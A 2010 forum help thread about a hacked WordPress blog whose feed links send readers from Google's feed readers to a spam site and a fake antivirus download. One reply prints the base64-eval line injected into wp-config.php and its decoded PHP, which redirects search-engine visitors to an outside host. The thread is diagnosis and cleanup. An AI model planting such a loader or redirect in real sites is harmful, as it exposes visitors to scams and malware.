Why is the links in my blog's feed redirects to http://p3p0.com/ instead my site (only in iGoogle, and Reader)?

12 views
Skip to first unread message

JonC

unread,
Feb 15, 2010, 8:45:46 AM2/15/10
to FeedBurner Help Group - Feed and Web Statistics
Hi guys,

I have a blog which uses Wordpress 2.9.1 (most recent version). Some
of my readers complained that when they try to click the links in my
feed ( http://feeds.feedburner.com/raktalicskafeed ) which are
supposed to navigate them to my webpage they arrives to the following
website: http://p3p0.com/?said=3333g&q=facebook ,and sometimes to a
fake antivirus page, which attempts to have them download an exe-file
(and this site recognized as harmful site by Firefox).

This issue only occurs in readers which are made by Google (iGoogle,
Google Reader). I tried this in Opera's built-in RSS-browser, and in
NewsCrawler too, but I didn't experienced any problems.

I suppose that there's something wrong with Reader (and iGoogle),
because when I click on a link in other feedreader it works in the
correct way. Btw if I add my original feed ( http://raktalicska.hu/feed
) to Google Reader (or iGoogle) the the same problem occurs, so maybe
this issue is not related to Feedburner, but I'm getting desperated,
because I wrote to the Reader help forum, and to the Wordpress forum
too, but nobody answered :S Maybe there'll be somebody who can help
me.

Could you please suggest some resolution to this issue?

Thanks in advance,

JonC ( http://raktalicska.hu )

robink

unread,
Feb 17, 2010, 7:26:09 AM2/17/10
to FeedBurner Help Group - Feed and Web Statistics
Hi jon

It's got nothing to do with Reader or google as such, your wordpress
site has been hacked
if you look in the wp-config.php file you will see something like:


eval(base64_decode("CglpZiAoc3Rya .....<snip>.... Owp9Cgk="));

which decodes to:

if (stristr($_SERVER[HTTP_REFERER],"google")) {
if (!stristr($_SERVER[HTTP_REFERER],".nu") and !
stristr($_SERVER[HTTP_REFERER],"site") and !
stristr($_SERVER[HTTP_REFERER],"inurl")){
preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
if (stristr($kk[1],"&")) {
preg_match ("/(.*?)\&/",$kk[1],$key2);
$keyword=urldecode($key2[1]);
}else {
$keyword=urldecode($kk[1]);
}
header("Location: http://fgnfdfthrv.bee.pl/?q=".$keyword);
exit();
}

}elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) {
preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
exit();
}elseif (stristr($_SERVER[HTTP_REFERER],"bing")) {
preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
exit();
}


as you can see, the referer is checked to be one of google, yahoo or
bing, and then a call is made to fgnfdfthrv.bee.pl, which returns a
redirect to p3p0.com

I'm currently trying to track down how to disinfect this hack, which
led me to your post. Hope this helps,

Robin

On Feb 15, 1:45 pm, JonC wrote:
> Hi guys,
>
> I have a blog which uses Wordpress 2.9.1 (most recent version). Some
> of my readers complained that when they try to click the links in my
> feed (http://feeds.feedburner.com/raktalicskafeed) which are
> supposed to navigate them to my webpage they arrives to the following
> website:http://p3p0.com/?said=3333g&q=facebook,and sometimes to a
> fake antivirus page, which attempts to have them download an exe-file
> (and this site recognized as harmful site by Firefox).
>
> This issue only occurs in readers which are made by Google (iGoogle,
> Google Reader). I tried this in Opera's built-in RSS-browser, and in
> NewsCrawler too, but I didn't experienced any problems.
>
> I suppose that there's something wrong with Reader (and iGoogle),
> because when I click on a link in other feedreader it works in the
> correct way. Btw if I add my original feed (http://raktalicska.hu/feed

JonC

unread,
Feb 25, 2010, 4:54:48 PM2/25/10
to FeedBurner Help Group - Feed and Web Statistics
Hi Robin,

meanwhile I detected this snippet you mentioned, deleted it, and it
solved my issue. I wonder how they hacked my site (I'm using the
latest Wordpress, I have a quite reliable host, etc.), but anyway: now
it fixed.

Btw thanks for your helping intention!

Yours sincerely:

JonC

> > website:http://p3p0.com/?said=3333g&q=facebook,andsometimes to a

JonC

unread,
Feb 25, 2010, 4:58:25 PM2/25/10
to FeedBurner Help Group - Feed and Web Statistics
Hi Robin,

meanwhile I successfully detected this code you mentioned, and deleted
it. It solved the issue, but I wonder how could somebody manage to
hack my site, as far as I know the Wordpress is a very reliable CMS-
system...

Btw thanks for your helping intention!

JonC

On febr. 17, 13:26, robink wrote:

> > website:http://p3p0.com/?said=3333g&q=facebook,andsometimes to a

Reply all
Reply to author
Forward
0 new messages